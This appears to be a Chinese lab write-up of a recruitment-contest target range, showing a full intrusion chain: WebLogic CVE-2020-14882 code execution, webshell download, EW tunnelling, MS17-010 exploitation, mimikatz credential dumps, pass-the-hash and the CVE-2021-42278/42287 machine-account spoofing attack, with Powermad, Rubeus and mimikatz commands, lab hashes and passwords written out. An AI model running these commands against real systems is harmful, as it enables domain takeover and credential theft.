2022 弱口令安全实验室招新赛-靶机挑战记录

news2025/2/24 12:25:32

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

  • 前言
  • 一、ubuntu 代码执行getshell
      • 获取webshell
  • 二、server 2008r2
      • EW 流量代理
      • ms17010
  • 三、AD机器账号伪造漏洞
      • 域内hash传递攻击
      • 登录域控
  • 总结


前言

2022 弱口令安全实验室招新赛开始之前看到了报名信息,后面忘记报名了,群里也是看到大佬们在讨论这个靶场,耐不住向某个报名了靶机挑战通道的师傅要了一份靶场,打打看。由于上课加搞毕设开题答辩,今天写一下打靶场记录。


提示:以下是本篇文章正文内容

靶场说明:

需要下载完成三个虚拟机,组成一个内网环境,全部搭建完成后组网才可完成题目。
三台的顺序是 ubuntu -server08 -server08DC
无需修改二三台的网卡
第一台ubuntu的ip可以查看一下自己虚拟机的nat网段来进行推断,二三台访问不到是正常情况,因为是内网靶场

一、ubuntu 代码执行getshell

第一台是ubuntu系统,nat 网段 我这里是192.168.216.0/24 段,ubuntu 的ip是:192.168.216.146

直接使用fsan进行扫描:
扫描结果开启两个端口:一个是22端口 ssh服务, 另一个是7005 weblogic 。另外还扫描出了未授权访问漏洞。
在这里插入图片描述

访问登录页,可以看到版本是 12.2.1.3 ,这个版本的漏洞也不少

在这里插入图片描述

获取webshell

测试发现是存在远程代码执行漏洞CVE-2020-14882的

执行id 命令,响应包中返回了结果

在这里插入图片描述
当前路径:/home/netuser/weblogic/Oracle/Middleware/user_projects/domains/base_domain
在这里插入图片描述利用 wget 下载webshell到可访问的静态路径中

在这里插入图片描述

使用python3 启动一个http服务端 可以看到服务端被访问了

在这里插入图片描述
访问存在

在这里插入图片描述

哥斯拉连接
在这里插入图片描述

当前的一个webshell权限是很低的一个weblogic 用户权限,通过查看passwd文件知道,netuser用户与root是可以进行登录的用户。
这里花费了大半天的时间尝试suid提权,内核漏洞提权,敏感信息搜索等等都提权不成功,linux下的提权还是提得少了。然后没有提权直接进入打内网环境。

二、server 2008r2

在前期信息收集中发现存在192.168.107.1/24内网网段,提权无果之后,准备对内网中的其他机器进行横向
在这里插入图片描述直接上fscan 扫描一波,在扫到的另外一台192.168.107.128 主机存在ms17010 漏洞,最后全端口扫描了一波最后还发现开启了47001端口 WinRM服务。
在这里插入图片描述没有其他更多的信息, 选择先使用ms17010打一波。由于192.168.107.128/24 段不能从外面直接访问,属于内网段中。搭建流量代理。

EW 流量代理

上传ew流量代理工具到ubuntu上,进行一个反向流量代理

攻击机上开启监听
在这里插入图片描述

给权限后执行
在这里插入图片描述本地配合Proxifier 配置ew流量代理
在这里插入图片描述

ms17010

直接起msf ,确认一下存在ms17010
在这里插入图片描述这里由于是处于深层的内网中,考虑选择payload 为正向连接
在这里插入图片描述
在这里插入图片描述
server08r2这个账户登录过,看了进程是没有存在杀软,考虑直接上mimikatz读取内存

在这里插入图片描述

在这里插入图片描述

从内存中得到server08r2 账户的明文密码:NcJVPV3w9Wf7

在这里插入图片描述
还有一个当前域机器WIN-S96L5Q5A734$用户的ntlm

在这里插入图片描述得到明文,发现3389 rdp服务没开,注册表开启

在这里插入图片描述
最后使用server08r2 用户进行登录,从最近访问位置中启动项找到flag.bat 运行后在桌面生成flag2

在这里插入图片描述

三、AD机器账号伪造漏洞

拿下第二台server2008 之后,通过ipconfig /all 发现了 另外一个内网段,192.168.48.1/24 ,并且是可能存在域的

在这里插入图片描述

可以看到是存在域环境的,但是由于我们当前登录的用户不是域用户,会提示拒绝访问

在这里插入图片描述

nbtscan 扫描得出 192.168.48.128 是域控DC

在这里插入图片描述

fscan 扫描 DC,发现也是存在ms17010 永恒之蓝漏洞的,这里也是想使用ms17010 直接拿下

在这里插入图片描述
但是后面利用ms17010 来打的时候很不稳定,弹回来的shell也会提示RPC错误,拒绝访问等等错误甚至会重启,从前面的来看一旦重启 lsass的内存信息就会丢失,抓不到用户明文密码。SERVER08R2 用户密码也不存在重用的情况。

这里使用域AD机器账号伪造漏洞 来达到一个提权

此时我们是拥有当前一个机器账户win-s96l5q5a734$ 的ntlm hash密文,可以利用ntlm hash进行一个hash 传递来获取域访问权限进行信息收集,或者看看能不能利用域漏洞进行提权或者其他的操作。

账户:win-s96l5q5a734$ 
ntlm:765886434d8392af3380b0d97638a7e0

域内hash传递攻击

使用mimakatz 进行一个ntlm 哈希传递攻击,在弹出的cmd窗口中进行的域控时间访问正常返回了。此时已经获得了一个域win-s96l5q5a734$机器账户的权限

提升权限
privilege::debug
使用win-s96l5q5a734$的NTLM hash值进行hash传递攻击,域:weak.com
sekurlsa::pth  /user:win-s96l5q5a734$  /domain:weak.com  /ntlm:765886434d8392af3380b0d97638a7e0

在这里插入图片描述
查看域内用户及域管理员组
在这里插入图片描述
weak-dc 账户是一个本地管理员组的用户
在这里插入图片描述

简单的查看了一下域内信息,看能不能利用域漏洞提权,之前刚好学习AD机器账号伪造漏洞,所以直接试一下

这里简单描述一下漏洞,具体的漏洞及协议细节可自行了解学习

在域内一般正常的机器账户时以"$" 符号结尾,且AD没有对域内机器账户进行检查,就可以存在不以"$" 符号结尾的域内机器账户名
漏洞形成点:
1.在创建一个新的域内机器账号时,利用CVE-2021-42278漏洞对当前新键机器账号伪造修改为域AD的机器账号一样账户名。
2.再擦除当前机器账号的spn信息
3.由于当前机器账号修改后与AD机器账号名一样,这时候去向kdc请求TGT,这时得到TGT中的PAC仍然是当前新建机器账户的权限
4.再修改当前机器账号与前面不一样的机器账号名。
5.使用得到的TGT通过S4U2self进行TGS请求
6.域控在找不到刚刚伪造的机器用户后,就在给TGT中的client info中的username加一个$,然后再去查询username$,
发现这个TGT client 域控机器账户自己,然后就把自己的PAC加入TS中,并且用自己的hash加密了TS,最后返回。
7.伪造者就得到了访问域控的TGS

接下来上传所需要的AD机器账号伪造漏洞攻击用的工具到机器上:

Powermad.ps1
PowerView.ps1
Rubeus.exe

在这里插入图片描述

使用刚刚hash传递攻击弹出的cmd窗口启动powershell进行操作,导入用到的两个powershell脚本

 powershell -ExecutionPolicy Bypass
 Import-Module .\Powermad.ps1
 Import-Module .\PowerView.ps1

在这里插入图片描述

创建一个域机器账户,需要输入密码

  New-MachineAccount -MachineAccount test -Domain weak.com -DomainController WIN-JK2FG246GEF.weak.com -Verbose

在这里插入图片描述
清除机器账户的spn信息

Set-DomainObject "CN=test,CN=Computers,DC=weak,DC=com" -Clear 'serviceprincipalname' -Verbose

在这里插入图片描述

重设机器名称,设置为DC域控机器名,伪造dc账户

Set-MachineAccountAttribute -MachineAccount test -Value "WIN-JK2FG246GEF" -Attribute samaccountname -Verbose

在这里插入图片描述
请求TGT票据

./Rubeus.exe asktgt /user:WIN-JK2FG246GEF /password:AvtBn123! /domain:weak.com /dc:WIN-JK2FG246GEF.weak.com /nowrap

在这里插入图片描述

查看票据

在这里插入图片描述

恢复创建的机器账号名,但要与原来的名称不一样。用于另外一个漏洞的触发条件

Set-MachineAccountAttribute -MachineAccount test -Value "test2" -Attribute samaccountname -Verbose

在这里插入图片描述

通过S4U2self申请TGS Ticket,获取DC ldap服务票据

./Rubeus.exe s4u /self /impersonateuser:"weak-dc" /altservice:"ladp/WIN-JK2FG246GEF.weak.com" /dc:"WIN-JK2FG246GEF.weak.com" /ptt /ticket:doIE8DCCBOygAwIBBaEDAgEWooIECjCCBAZhggQCMIID/qADAgEFoQobCFdFQUsuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0Gwh3ZWFrLmNvbaOCA8owggPGoAMCARKhAwIBAqKCA7gEggO0Eix8k0tTQXIMyX7cpnJPcHm53ZmwQuGgNbEYPZfvapcKphQvyn/MeVn8fKVYkf6Pr7/63swZhX3PRLmLdKqtcgfj+F79ef0P+ei8Kxu2SHVisYd+3ZfuSsej2Ldgba7w2UKj4uAR3GSO85Mi6dXJPweWXde3X2jQgM9jcZJs0Vh0qHr4IxlJjEXb2jbUtiPtTmCVDzrXe5WnxqtcwJzaO9vkGq+LDvEflyMX0sRqIFEr4eMJpzkFUXOa2TvVuFwl54lECJo6ZqsD8z/n7TVm8LmX63d92FJce9PWqSrUjDiIY9OWPm8VfEO6iVf0mvl2lYRaMEPvw9lc1PZ7LSjPQ3FOmeGeZcXoWEGlQBc0Oh0jUtHMWs66Qdc0Zw5g9XBbsJAm8LTf32dJCYBe73fc/Ai7xcqDDxqLYoKeu9YGvoE/4htbtrFwww/iJxgJIn30er4IlavokXdo3pwR4SCYxf+ndUe2N1EPuUUuM3E2yexpx7hzwGaFbSh3TQqMqRGQqGOCsUcq9APTSD8zv1w3nJE/yI0KfdLOJOU9puos7/E0x8GE77kwXYZn5y7ZwngVsVGsjbxHHIlyE9HwW2PwcUzP8h4RqFdW7Jn5lKVMC5Q7Ocayjgu5YSt4TDHR2Ws6nffewCfdGM1AxGn3EVXjFN05t0Fv+lMxmmGIMOKNDASbMEI2Wig7Rb0JEYrk+ZX/x30PXgq75InNvyBuiOeCyrcMBmaTQdwv4+f2qqS0pjyrqGgiMM2fJMlOLSLrxOOwomWXntRZxnbg2luUX0cvbdpUmSdyYlDYmXqNZl0wCEAR8sLVbOkj17ygPBFHbuxIlqVSm5ra3hupMa3Ti0YxXf20CRNptWSYt0r+0zBdFgHaVJyzHi/9oytMcWIk12GK6f0vDVftmwJAFDMUYRctGayEynp3JwmjAf5knac6Yo7syP/KJDqgvKIWkGD4i3VJ7UNmATuT3mC17CZjf79PMIjnXudXRGfvvPkDCUdrFtZ7WkonYCXc6kv97/aWKBLlHUldHXl4Snb/NFvDtyg/qw+AUJzeGdo5PbsO2TfYgjUTkjP5Z1kJr5AshKAel/bP1Yu/JWTP/WzsjE2x+OdfSm2yuhfLc4RUfi9KRkjlEgHBuudZgXqQu8mvlF/DtDuN6BtdpyiqSR8qde1PR39Md7KBopj3GhsapF+J/2p8JPIl0OH1OcLcdpY/cAwga+Ek9IN9K6gb8RWeXPVGRjr44xNtx/PYe/B2XMYmGj7fyT1PTtlKo4HRMIHOoAMCAQCigcYEgcN9gcAwgb2ggbowgbcwgbSgGzAZoAMCARehEgQQUfA6UoL7rxdMC2jnGhR0maEKGwhXRUFLLkNPTaIcMBqgAwIBAaETMBEbD1dJTi1KSzJGRzI0NkdFRqMHAwUAQOAAAKURGA8yMDIyMTExNTE2MTg1N1qmERgPMjAyMjExMTYwMjE4NTdapxEYDzIwMjIxMTIyMTYxODU3WqgKGwhXRUFLLkNPTakdMBugAwIBAqEUMBIbBmtyYnRndBsId2Vhay5jb20=

在这里插入图片描述

申请cifs服务票据
在这里插入图片描述
可以看到,已经得到了ldap服务与cifs服务票据

![在这里插入图片描述](https://img-blog.csdnimg.cn/204c96a051a34c85bd28a1d3e1b557a9.png

查看dc上的文件
在这里插入图片描述
有了服务票据之后,利用DCSync 导出域内所有用户的hash
在这里插入图片描述
用户的hash到手之后,cmd5跑了一波weak-dc与Administrator用户都是跑不出来,密码挺复杂看来。

直接使用Administrator域管理员的ntlm 进行高权限的hash传递攻击

privilege::debug

sekurlsa::pth  /user:Administrator  /domain:weak.com  /ntlm:597e2e3805b87b5e3e52798392a55b6a

在这里插入图片描述

在攻击成功弹出来的cmd窗口中,由于已经是一个域管理员Administrator高权限的cmd窗口,直接对域控DC进行ipc$连接是不需要输入密码的。 使用psexec 进行一个横向渗透

在这里插入图片描述

当前已连接到域控DC

在这里插入图片描述

查看当前已登录用户,weak-dc登录过,上mimakatz抓明文密码

query user

在这里插入图片描述

上传mimaktz到域控DC上

在这里插入图片描述

dump 内存明文密码
得到weak-dc 用户密码:7sYUVa%kFA7]

![在这里插入图片描述](https://img-blog.csdnimg.cn/407a11a3ae67495fb518e4d0e475a8cb.png

登录域控

这里如果想要登录到域控,域控是没有开启3389远程登录的,需要开启,并且把weak-dc 用户加入远程登录用户组中
![在这里插入图片描述](https://img-blog.csdnimg.cn/c3cbd860396c4586b4da394af9ff5364.png

使用当前用户启动的mstsc登录,修改完之后登录还会显示拒绝,因为当前本机用户没有权限登录,而且编辑不了登录的用户

在这里插入图片描述
使用hash传递攻击的高权限窗口启动mstsc,输入weak-dc用户的密码登录;或者在当前机器用也添加weak-dc 用户远程登录权限,退出后以weak-dc 登录本机,再登录域控DC
在这里插入图片描述最后在启动中找到flag.bat 运行后就可以得到flag3

在这里插入图片描述

总结

还行,对linux下的提权还是不太掌握,另外在真实环境中也会存在ms17010漏洞攻击不稳定的情况,一旦蓝屏重启之类的,内存中的明文密码就会丢失。不到万不得以最好是在有把握稳定反弹shell的情况下利用ms17010。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/10321.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Chakra UI Pro (Marketing + Application UI + ECommerce)

Chakra UI Pro (Marketing Application UI ECommerce) 快速创建可访问的 React 应用 程序 Chakra UI 是一个简单、模块化且可访问的组件库,它为您提供构建 React 应用程序所需的构建块。 更少的代码。更快的速度 花更少的时间编写 UI 代码,将更多的时间…

ZYNQ之嵌入式学习----开篇实验Hello World

1 ZYNQ 嵌入式系统的开篇实验Hello World 阅读本文需先学习: FPGA学习----Vivado软件使用 1.1 ZYNQ 嵌入式系统开发流程 创建Vivado工程使用IP Integrator 创建 Processor System生成顶层HDL生成比特流,导出到SDK在SDK中创建应用工程板级验证 开篇实验任务是在 …

【前端笔记】小记一次Antd Vue 1.x (for vue2.x) icons组件按需引入的实现

因为项目有样式规范要求,和规范最相似的就是antd了,再加上项目用的是2.x,所以使用antd 1.x版本进行开发。项目完成后,理所应当对打包进行优化,于是遇到了icons组件全量引入的问题,查找了资料实现后特地记录…

R语言作业--第六章判别分析

目录 思考题4)原题目:贝叶斯判别的基本思想是什么? 练习题第3题:以舒张期血压和讯将胆固醇含量预测被检查者是否患冠心病,测得15名冠心病人和16名健康人的舒张压。X1及血浆胆固醇含量X2,结果如表6-4。 练习题第4题:…

Day03 leecode#有效的括号#合并两个有序链表

题目描述: 有效的括号 给定一个只包括 ‘(’,’)’,’{’,’}’,’[’,’]’ 的字符串 s ,判断字符串是否有效。 有效字符串需满足: 左括号必须用相同类型的右括号闭合。 左括号必…

大模型相关资料整理

1. 大模型的挑战 GPT-3 175B模型的参数如下: 网络层(Number of layers): 96 句子长度(Sequence length): 2048 隐藏层大小(Hidden layer size): 12288 词汇表(Vocabulary size&#…

java高级--SpringBoot篇

目录 一、什么是SpringBoot 二、SpringBoot的特点 三、springboot快速入门 四、介绍配置文件的种类 五、开发环境配置文件的切换 六、读取springboot配置文件中的内容 七、Springboot注册web三大组件 八、SpringBoot的底层原理 8.1 包扫描的原理 8.2 springboot自动装配原理…

如何备考高级软考的系统架构设计师?

架构设计师是软考高级科目,比较难,每一年的通过率在15%左右。 不过软考它的特点是考察的深度不深,但是范围比较广,特别是高级,对项目经验比较看重,如果没有项目经验的朋友,一定要多准备项目素材…

springboot10:web开发常用功能(拦截器,文件上传,异常处理)

一.拦截器 1.使用 访问任何请求,都只有登录才能访问,挨个写入请求太困难,使用拦截器机制handlerIntercepter(prehandle方法,posthandle方法,afterCompletion方法)编写一个拦截器实现handlerInterceptor接…

算法与数据结构 - 字节跳动笔试题

😄这里将持续更新接下来做过的字节跳动公司相关的笔试题,包括网上收集的秋春招笔试题、以及自己参加的字节举办的编程赛的题目。 🚀导航: ID题目描述NO.1小红走迷宫简单、按逻辑写即可ACNO.2铺水管dfs回溯、注意剪枝才能ACNO.3喵汪故事借助二分才能ACNO.4小超的游戏pytho…

学术论文写作以及discussions/results与conclusion的区别

经验帖 | 如何写SCI论文? Result、Discussion和Conclusion区别解析 如何写学术论文 一篇论文只能有一个主题,不能出现过多的研究问题,这样只会让文章读起来很乱。就像大牛经常讲的,“one paper, one story”,一篇论文…

unix/linux make

GNU:make 参考文档 程序的编译和链接 一般来说,无论是C还是C,首先要把源文件编译成中间代码文件,在Windows下也就是 .obj 文件,UNIX下是 .o 文件,即Object File,这个动作叫做编译(compile&…

HummerRisk V0.5.1 发布:新增对象存储、优化K8s 资源态势和资源拓扑等

HummerRisk V0.5.1 发布:新增对象存储对接查看功能,增加 K8s 资源的部署信息查看,深度优化K8s 资源拓扑,并优化了镜像检测、云检测及资源态势同步等多个内容。 感谢社区中小伙伴们的反馈,你们的认可是我们前进的动力。…

java中的函数式接口是什么?

问题现象: 最近在复习java基础知识,发现了一个面试题: java中的函数式接口是什么? 问题分析: 老实说,我一开始看到“函数式接口”这个术语,愣了一下: java中的函数式接口是什么&…

移动WEB开发之流式布局--二倍图

物理像素&物理像素比 物理像素点指的是屏幕显示的最小颗粒,是物理真实存在的。这是厂商在出厂时就设置好了,比如苹果6\7\8 是 750* 1334 物理像素比就是屏幕的分辨率,分辨率越高,显示越清楚,750* 1334就是横的有750的像素点…

运行mbedtls自带Demo ssl_client的记录

概述: 运行mbedtls自带 ssl demo的记录; 操作过程: 编译Demo,请看我专栏中的相关文章 先运行服务端程序,运行ssl_server.exe,运行结果如下: mbedtls-3.2.1\mbedtls-3.2.1\programs\ssl> .…

目标检测论文解读复现之九:基于改进YOLOv5的复杂场景下SAR图像船舶检测方法

前言 此前出了目标改进算法专栏,但是对于应用于什么场景,需要什么改进方法对应与自己的应用场景有效果,并且多少改进点能发什么水平的文章,为解决大家的困惑,此系列文章旨在给大家解读最新目标检测算法论文&#xff0…

Linux:shell编程(内含:1.shell简介+2.shell实操+3.shell的变量介绍+4.shell变量的定义)

1.shell简介: 解释:界面编写各种命令时,需要一个解释器,解释器先执行后给linux。执行完之后,结果返回给界面。经常使用的是bash。 注:若界面执行的命令比较复杂,可以写一个脚本,xxx…

医疗健康产品展:联影医疗

​ 国内医疗健康行业的独角兽公司(估值超10亿) 联影医疗 1 基本信息 联影医疗是一家医疗设备和医疗信息化解决方案提供商,为医疗机构提供涵盖影像诊断设备、放疗设备、服务培训、医疗IT的全方位医疗解决方案。 联影筹建于2010年10月&…

第七章 树与森林

树与森林 7.1树的概念与表示 7.1.1树的定义及相关术语 1.树的定义 ​ 树(Tree)是n(n≥0)个有限数据元素的集合。当n=0时,称这棵树为空树。在一棵非树T中: ​ ⑴有一个特殊的数据…